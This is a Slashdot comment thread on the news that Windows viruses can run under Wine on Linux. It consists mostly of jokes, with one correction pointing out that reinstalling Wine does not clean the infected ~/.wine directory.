Re:Strongly misleading headline! (1)

erebadan (1614611) | more than 4 years ago | (#29859089)

Technically speaking a virus is a small piece of code that can replicate and spread itself. Whatever it does (or not) to your system doesn't matter much. Once your machine is infected, you become a threat to others.

Stop whining. (1)

itsybitsy (149808) | more than 4 years ago | (#29858955)

Don't want a virus, it's simple, stop whining.

This is not news (1)

93 Escort Wagon (326346) | more than 4 years ago | (#29859015)

We've seen "viruses running under Wine" stories on Slashdot before. Years before, as a matter of fact.

BTW I love the really pathetic spin in the submission - "things don't work correctly, and that's a plus!"

What will they name it (1)

syntap (242090) | more than 4 years ago | (#29859083)

The Linux virus via WINE, or S-WINE bug.

Just goes to show you (1)

illumastorm (172101) | more than 4 years ago | (#29859099)

This just goes to shows you how good Windows emulation on Linux is.

Re:Just goes to show you (1)

jedidiah (1196) | more than 4 years ago | (#29859285)

Yup. An emulated copy of Windows is still a copy of Windows.

You need to treat it like Typhoid Mary and keep it away from things it can infect or get infected by.

Re:Just goes to show you (0)

Anonymous Coward | more than 4 years ago | (#29859337)

Wine is not (an) emulator!/ Wine is not emulation!

Fear the WINE Flu !!! (1)

Jackie_Chan_Fan (730745) | more than 4 years ago | (#29859147)

Obama has just declared the WINE Flu a boring and uninteresting, non mainstream worthless distraction from the launch of Windows 7. It runs viruses natively folks!

Actually Windows 7 is quite good.

Good luck Bro. -Opie

YES (0)

Anonymous Coward | more than 4 years ago | (#29859179)

2010 will definitely be the year of the linux desktop now!

Wrong (2, Insightful)

pablomme (1270790) | more than 4 years ago | (#29859201)

From TFA:

If it managed to infect the Wine registry well enough that it's run automatically, I will have to go into the Wine registry to remove it manually. Or I could run a couple of simple commands:
sudo aptitude purge wine;
sudo aptitude install wine;

Wrong. Wine installs stuff in ~/.wine. The above commands don't touch user directories, so he would end up with a fresh system-wide wine installation but the same malware-ridden user config.

Finally! (0)

Anonymous Coward | more than 4 years ago | (#29859203)

Now Linux is ready for the desktop!

ha, Linux wins yet again! (1)

Tumbleweed (3706) | more than 4 years ago | (#29859347)

See, Linux _can_ do everything Windows can do! A better Windows than Windows...where have I heard that before?

Hmm (1)

Krneki (1192201) | more than 4 years ago | (#29859433)

I hope it won't get the new sWine virus.
Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>